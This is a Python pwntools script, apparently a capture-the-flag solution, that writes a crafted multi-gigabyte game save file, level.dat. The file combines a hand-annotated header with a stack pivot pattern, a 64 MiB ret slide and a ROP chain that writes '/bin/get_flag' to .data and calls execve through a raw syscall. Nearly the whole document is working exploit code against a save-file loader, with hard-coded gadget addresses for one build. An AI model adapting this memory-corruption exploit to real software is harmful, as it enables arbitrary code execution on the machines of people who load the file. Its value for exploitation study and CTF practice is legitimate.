#!/usr/bin/env python3
from pwn import p8, p16, p32, p64
from pwnlib.rop import ROP
def main():
    """Assemble a crafted save file and write it to ``pwn/level.dat``.

    The output is one byte string ``b`` built strictly in order: a header
    whose fields are annotated inline, a repeated stack-pivot pattern, a
    ``ret`` slide, a pwntools ROP chain, and zero padding up to a fixed total
    length. The header field names are the author's reverse-engineering notes
    (several are marked ``?``), not a published format; treat them as
    unverified.

    Side effects: prints the ROP chain dump to stdout and (over)writes
    ``pwn/level.dat`` relative to the current working directory. The file is
    roughly 4 GiB and ``b`` is held fully in memory before the write.

    All gadget and data addresses below are hard-coded for one specific
    target build (see ``buildVersion``); they are meaningless elsewhere.
    """
    # --- save-file header. Every append shifts everything after it, so the
    # field order here is part of the payload; do not reorder these lines.
    b = p16(1) + p16(1) + p16(61) + p16(0)  # some version
    b += p8(0)  # quality version
    b += p8(0)  # ? (unknown field)
    b += p8(0)  # ? (unknown field)
    b += p8(0)  # ? (unknown field)
    b += p8(1)  # difficulty
    b += p8(0)  # finished
    b += p8(0)  # playerWon
    b += p8(0)  # nextLevel -> string
    b += p8(0)  # canContinue
    b += p8(0)  # finishedButContinuing
    b += p8(0)  # saving replay
    b += p8(1)  # allow non admin debug options
    b += p8(1) + p8(1) + p8(0x3b)  # application version "loadedfrom"
    b += p16(0xe9bf)  # buildVersion
    b += p8(1)  # allowed commands
    b += p8(0)  # no mods, not even base lol
    b += p32(0)  # startup settings crc
    b += p8(3) + p8(0)  # value 3 for result?
    b += p8(0)  # bool false to get into the if
    b += p8(0xff) * 5  # encoding an int (-1)
    # --- stack pivot. A 32-byte pattern (two slide addresses, two pivot
    # gadgets) repeated 0x200000 / 8 = 262144 times, i.e. 8 MiB in total.
    binary_end = 0x278f000  # NOTE(review): assigned but never used below
    slide_target = 0xe000000  # the place we hope to find our return slide at
    mov_rsp_rcx = 0x2043fa4  # 0x2043fa4: mov rsp, rcx; ret;
    stack_pivot = p64(slide_target)
    stack_pivot += p64(slide_target)
    stack_pivot += p64(mov_rsp_rcx)
    stack_pivot += p64(mov_rsp_rcx)
    b += stack_pivot * int(0x200000 / 8)
    # --- ROP chain. Built with an empty ROP() so every entry is given as a
    # raw value; pwntools does no gadget lookup here.
    rop_chain = ROP([])
    # 16-byte, NUL-padded string written to .data in two 8-byte halves below.
    execution_target = '/bin/get_flag\0'.ljust(16, '\0')
    # --- write execution target string to memory
    rop_chain.raw(0x40e2d4)  # pop rsi; ret;
    rop_chain.raw(execution_target[:8])  # value for rsi (first 8 bytes)
    rop_chain.raw(0x40e86b)  # pop rax; ret;
    rop_chain.raw(0x027920e0)  # value for rax (.data as write target)
    rop_chain.raw(0x0000000001c73b08)  # mov qword ptr [rax], rsi; ret;
    # -- second half of the string, 8 bytes further into .data
    rop_chain.raw(0x40e2d4)  # pop rsi; ret;
    rop_chain.raw(execution_target[8:])  # value for rsi (last 8 bytes)
    rop_chain.raw(0x40e86b)  # pop rax; ret;
    rop_chain.raw(0x027920e0 + 8)  # value for rax (.data as write target)
    rop_chain.raw(0x1c73b08)  # mov qword ptr [rax], rsi; ret; (same gadget as above)
    # --- syscall
    rop_chain.raw(0x40e86b)  # pop rax; ret;
    rop_chain.raw(59)  # value for rax (syscall number)
    rop_chain.raw(0x40e150)  # pop rdi; ret;
    rop_chain.raw(0x027920e0)  # value for rdi (.data as read target)
    rop_chain.raw(0x40e2d4)  # pop rsi; ret;
    rop_chain.raw(0)  # value for rsi
    rop_chain.raw(0x40e68f)  # pop rdx; ret;
    rop_chain.raw(0)  # value for rdx
    rop_chain.raw(0x42c4d6)  # syscall
    # --- ret slide: 0x4000000 / 8 = 8388608 copies of one `ret` address,
    # i.e. 64 MiB, placed before the chain itself.
    return_slide = p64(0xbf1f1c)  # ret
    b += return_slide * int(0x4000000 / 8)
    print(rop_chain.dump())  # human-readable listing of the chain, to stdout
    b += rop_chain.chain()
    # Pad to exactly 4294967334 bytes (2**32 + 38). The script does not say
    # why this size; presumably it matters to how the loader computes the
    # file length — confirm against the target before changing it.
    b += p8(0) * (4294967334 - len(b))
    # NOTE(review): the handle is never closed explicitly; a `with` block
    # would be the idiomatic form and guarantees the flush on error paths.
    open("pwn/level.dat", "wb").write(b)
# Script entry point; importing this module does not generate the file.
if __name__ == "__main__":
    main()